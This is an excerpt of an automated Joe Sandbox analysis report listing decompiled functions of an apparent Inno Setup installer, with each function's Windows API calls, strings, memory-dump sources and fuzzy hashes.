                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                          • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                          • API String ID: 2610873146-3407710046
                                                                          • Opcode ID: 1a12ae3bf6497ff777cd16400bb62bc7ce249fae767d1011b5c9c7ae1396f400
                                                                          • Instruction ID: 4c37a186de2a83ca6a9e6f1427afc5cce354ac5e92891655707437263646b99d
                                                                          • Opcode Fuzzy Hash: 1a12ae3bf6497ff777cd16400bb62bc7ce249fae767d1011b5c9c7ae1396f400
                                                                          • Instruction Fuzzy Hash: 8621C571700B006BD310E664DD41F3B3798EB84710F08063AF984DB3D2EAB8EC008B9A
                                                                          Function 0042F180 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 82libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetActiveWindow.USER32 ref: 0042F18C
                                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A0
                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1AD
                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1BA
                                                                          • GetWindowRect.USER32(?,00000000), ref: 0042F206
                                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F244
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Window$AddressProc$ActiveHandleModuleRect
                                                                          • String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
                                                                          • API String ID: 2610873146-3407710046
                                                                          • Opcode ID: f060aae0b7a5edf3cc9df1b8e2ac1156138d1c343137e24e009784064c48acd9
                                                                          • Instruction ID: fe4b6ce3f65a79f89e9c436b8398c0b3b6e1cac74b3897b930778965e8aa8e9e
                                                                          • Opcode Fuzzy Hash: f060aae0b7a5edf3cc9df1b8e2ac1156138d1c343137e24e009784064c48acd9
                                                                          • Instruction Fuzzy Hash: 8A21D479300710ABD700D668EC81F3B36E8EB85710F88457AF944DB3C1DA79EC048BA9
                                                                          Function 00458A3C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 127pipeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458C1B,?,00000000,00458C7E,?,?,02153858,00000000), ref: 00458A99
                                                                          • TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,00458BB0,?,00000000,00000001,00000000,00000000,00000000,00458C1B), ref: 00458AF6
                                                                          • GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,00458BB0,?,00000000,00000001,00000000,00000000,00000000,00458C1B), ref: 00458B03
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458B4F
                                                                          • GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458B89,?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,00458BB0,?,00000000), ref: 00458B75
                                                                          • GetLastError.KERNEL32(?,?,00000000,00000001,00458B89,?,-00000020,0000000C,-00004034,00000014,02153858,?,00000000,00458BB0,?,00000000), ref: 00458B7C
                                                                            • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
                                                                          • String ID: CreateEvent$TransactNamedPipe
                                                                          • API String ID: 2182916169-3012584893
                                                                          • Opcode ID: 893ade2b7d25531ff66c13e68608fa62c4cd61168c1a2b8304732b74ac398c25
                                                                          • Instruction ID: 8abbb299140198d1acf2f300c186b6d7a0c7583c2a92940a340f901db1703015
                                                                          • Opcode Fuzzy Hash: 893ade2b7d25531ff66c13e68608fa62c4cd61168c1a2b8304732b74ac398c25
                                                                          • Instruction Fuzzy Hash: D4418771A00608EFDB15DF95CD81F9EB7F8EB48714F10406AF904F7292DA789E44CA28
                                                                          Function 00456B40 Relevance: 15.8, APIs: 3, Strings: 6, Instructions: 99libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456CA5,?,?,00000031,?), ref: 00456B68
                                                                          • GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456B6E
                                                                          • LoadTypeLib.OLEAUT32(00000000,?), ref: 00456BBB
                                                                            • Part of subcall function 00453470: GetLastError.KERNEL32(00000000,00454005,00000005,00000000,0045403A,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004978B1,00000000), ref: 00453473
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressErrorHandleLastLoadModuleProcType
                                                                          • String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
                                                                          • API String ID: 1914119943-2711329623
                                                                          • Opcode ID: 429f9213fdce0867704162136d35381b6641e802cf297fe1828a7e481cb37b2a
                                                                          • Instruction ID: 90c7a9fdd6b9eff4f50a7868ac1bc5a0a48bbd230e3c9f86fc21845b06ed4ed7
                                                                          • Opcode Fuzzy Hash: 429f9213fdce0867704162136d35381b6641e802cf297fe1828a7e481cb37b2a
                                                                          • Instruction Fuzzy Hash: 1B31B271A00A04AF9702EFAACC51D5BB7BDEB89746752846AFC04D3752DA38DD04C768
                                                                          Function 00416D78 Relevance: 15.2, APIs: 10, Instructions: 167windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • RectVisible.GDI32(?,?), ref: 00416E0B
                                                                          • SaveDC.GDI32(?), ref: 00416E1F
                                                                          • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E42
                                                                          • RestoreDC.GDI32(?,?), ref: 00416E5D
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00416EDD
                                                                          • FrameRect.USER32(?,?,?), ref: 00416F10
                                                                          • DeleteObject.GDI32(?), ref: 00416F1A
                                                                          • CreateSolidBrush.GDI32(00000000), ref: 00416F2A
                                                                          • FrameRect.USER32(?,?,?), ref: 00416F5D
                                                                          • DeleteObject.GDI32(?), ref: 00416F67
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                                          • String ID:
                                                                          • API String ID: 375863564-0
                                                                          • Opcode ID: 4f2037b5eabd4c0ddd7adb5546328da8476fa2c27bed59ce0fc3228c4463e070
                                                                          • Instruction ID: 3aa003abb57efcc62207c922e0442432c52dbc4458161ac97ea4a6727b5fec63
                                                                          • Opcode Fuzzy Hash: 4f2037b5eabd4c0ddd7adb5546328da8476fa2c27bed59ce0fc3228c4463e070
                                                                          • Instruction Fuzzy Hash: 7F512B716086459FDB50EF29C8C0B9777E8AF48314F15466ABD889B287C738EC81CB99
                                                                          Function 00404ABF Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
                                                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
                                                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
                                                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
                                                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
                                                                          • GetFileType.KERNEL32(?,000000F5), ref: 00404C11
                                                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
                                                                          • GetLastError.KERNEL32(000000F5), ref: 00404C46
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                          • String ID:
                                                                          • API String ID: 1694776339-0
                                                                          • Opcode ID: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                          • Instruction ID: 0555156f4d2a620bb114dc01d937536d57074fdea11cd86abdfeb4dd56d828b4
                                                                          • Opcode Fuzzy Hash: 9f56c7289f94e04900e6d065ddfea074988f08e379b72121dafcd5ad7d79337d
                                                                          • Instruction Fuzzy Hash: 3741B3F02093009AF7305E248905B2375E5EBC0755F208E3FE296BA6E0D7BDE8458B1D
                                                                          Function 004221E0 Relevance: 15.1, APIs: 10, Instructions: 74windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetSystemMenu.USER32(00000000,00000000), ref: 0042222B
                                                                          • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422249
                                                                          • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422256
                                                                          • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422263
                                                                          • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422270
                                                                          • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 0042227D
                                                                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 0042228A
                                                                          • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00422297
                                                                          • EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222B5
                                                                          • EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D1
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Delete$EnableItem$System
                                                                          • String ID:
                                                                          • API String ID: 3985193851-0
                                                                          • Opcode ID: 5abdbd2448cd02f00dbd9e0a18e72027fb78d1268677703bf36b2e23ad6afd93
                                                                          • Instruction ID: 3d512aed001548988d9f6823c75d43677a46120aeb5bb01c9b252fa7414fdf33
                                                                          • Opcode Fuzzy Hash: 5abdbd2448cd02f00dbd9e0a18e72027fb78d1268677703bf36b2e23ad6afd93
                                                                          • Instruction Fuzzy Hash: 692144703407447AE720E724DD8BFABBBD8AB04708F1455A5B6487F6D3C2F9AB804698
                                                                          Function 00480E18 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 175windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • FreeLibrary.KERNEL32(10000000), ref: 00480FD5
                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00480FE9
                                                                          • SendNotifyMessageA.USER32(0001043E,00000496,00002710,00000000), ref: 0048105B
                                                                          Strings
                                                                          • Not restarting Windows because Setup is being run from the debugger., xrefs: 0048100A
                                                                          • GetCustomSetupExitCode, xrefs: 00480E75
                                                                          • DeinitializeSetup, xrefs: 00480ED1
                                                                          • Deinitializing Setup., xrefs: 00480E36
                                                                          • Restarting Windows., xrefs: 00481036
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary$MessageNotifySend
                                                                          • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                          • API String ID: 3817813901-1884538726
                                                                          • Opcode ID: aeb7eeed0520e5db2a06f6f9575c7ce6fe4ce849ef8be63e157f84bdb35f0c9d
                                                                          • Instruction ID: 3a7bead0d2027120b4b43806ed62f13ca717c16daae07b60498e62be9a129c9c
                                                                          • Opcode Fuzzy Hash: aeb7eeed0520e5db2a06f6f9575c7ce6fe4ce849ef8be63e157f84bdb35f0c9d
                                                                          • Instruction Fuzzy Hash: 6E5191307042409FD711EB65D9A5B6E77E8EB5A304F50887BF900D73A2CB38A849CB9D
                                                                          Function 004614B4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 82COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SHGetMalloc.SHELL32(?), ref: 004614EF
                                                                          • GetActiveWindow.USER32 ref: 00461553
                                                                          • CoInitialize.OLE32(00000000), ref: 00461567
                                                                          • SHBrowseForFolder.SHELL32(?), ref: 0046157E
                                                                          • CoUninitialize.OLE32(004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 00461593
                                                                          • SetActiveWindow.USER32(?,004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 004615A9
                                                                          • SetActiveWindow.USER32(?,?,004615BF,00000000,?,?,?,?,?,00000000,00461643), ref: 004615B2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                          • String ID: A
                                                                          • API String ID: 2684663990-3554254475
                                                                          • Opcode ID: 1a2b14b0ce593c78e5b77d196e88522ccd9c3a7e94d83b7f20090faf3fe85af4
                                                                          • Instruction ID: 3b7aa7431835c7c777c0b5d0eb650662cb24b1be5a668883a221ebb7e5be7499
                                                                          • Opcode Fuzzy Hash: 1a2b14b0ce593c78e5b77d196e88522ccd9c3a7e94d83b7f20090faf3fe85af4
                                                                          • Instruction Fuzzy Hash: 05310F70D00218AFDB00EFA6D885A9EBBF8EF09304F55847AF415E7251E6789A04CB5A
                                                                          Function 004727E0 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 67COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFileAttributesA.KERNEL32(00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000,?,00472AFD,?,?,00000000,00472D6C), ref: 00472804
                                                                            • Part of subcall function 0042CD8C: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE02
                                                                            • Part of subcall function 00406F40: DeleteFileA.KERNEL32(00000000,0049B628,00497BFD,00000000,00497C52,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F4B
                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000,?,00472AFD), ref: 0047287B
                                                                          • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,004728A1,?,?,?,00000008,00000000,00000000,00000000), ref: 00472881
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                          • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                          • API String ID: 884541143-1710247218
                                                                          • Opcode ID: 1868d1ec2436a7bbc0d7041c4ffcd453102d48d96e31a7c571d0111a3cf3086d
                                                                          • Instruction ID: 279d6da86f281c7a9c803d865f3c4407023b84140d9db6ac64499a617a38ab60
                                                                          • Opcode Fuzzy Hash: 1868d1ec2436a7bbc0d7041c4ffcd453102d48d96e31a7c571d0111a3cf3086d
                                                                          • Instruction Fuzzy Hash: 8A11E270B005147BDB01F6658D82BAE73ACDB45754F62827BB804A72C1DB7C9E028A1E
                                                                          Function 0045D0D4 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 41libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D0DD
                                                                          • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D0ED
                                                                          • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D0FD
                                                                          • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D10D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                          • API String ID: 190572456-3516654456
                                                                          • Opcode ID: dbb685680a16ba3fccec3577b7ec4e51ea72545e87c1ddc4c02616cb3473d65c
                                                                          • Instruction ID: 76eb10cdb098e6f3740e4570fa0e0ca14f9d337f92906be3718b60d9f676c82f
                                                                          • Opcode Fuzzy Hash: dbb685680a16ba3fccec3577b7ec4e51ea72545e87c1ddc4c02616cb3473d65c
                                                                          • Instruction Fuzzy Hash: 800112B0D01B00DAE724DFB69DD572736A5ABA4306F10C13B9C49D62A2D77D0859DF2C
                                                                          Function 0041A8D4 Relevance: 13.7, APIs: 9, Instructions: 176windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SetBkColor.GDI32(?,00000000), ref: 0041A9B1
                                                                          • 73A24D40.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020,?,00000000), ref: 0041A9EB
                                                                          • SetBkColor.GDI32(?,?), ref: 0041AA00
                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA4A
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041AA55
                                                                          • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA65
                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAA4
                                                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041AAAE
                                                                          • SetBkColor.GDI32(00000000,?), ref: 0041AABB
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Color$StretchText
                                                                          • String ID:
                                                                          • API String ID: 2984075790-0
                                                                          • Opcode ID: 33ed346255d2d01e66c926e049e6617e656dc0545b4cfc6f34fc57e337ce283f
                                                                          • Instruction ID: f35f62ab74b2522f6310a7e8d9a92b24202350a16c816e0881424610f10e5e30
                                                                          • Opcode Fuzzy Hash: 33ed346255d2d01e66c926e049e6617e656dc0545b4cfc6f34fc57e337ce283f
                                                                          • Instruction Fuzzy Hash: 9F61C7B5A00105AFCB40EFADD985E9EB7F8EF08314B1085AAF518DB262C735ED408F58
                                                                          Function 00457EE4 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 126COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0042D8BC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8CF
                                                                          • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458098,?, /s ",?,regsvr32.exe",?,00458098), ref: 0045800A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2935805331.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.2935777588.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935895133.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935920117.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935935935.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.2935960462.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDirectoryHandleSystem
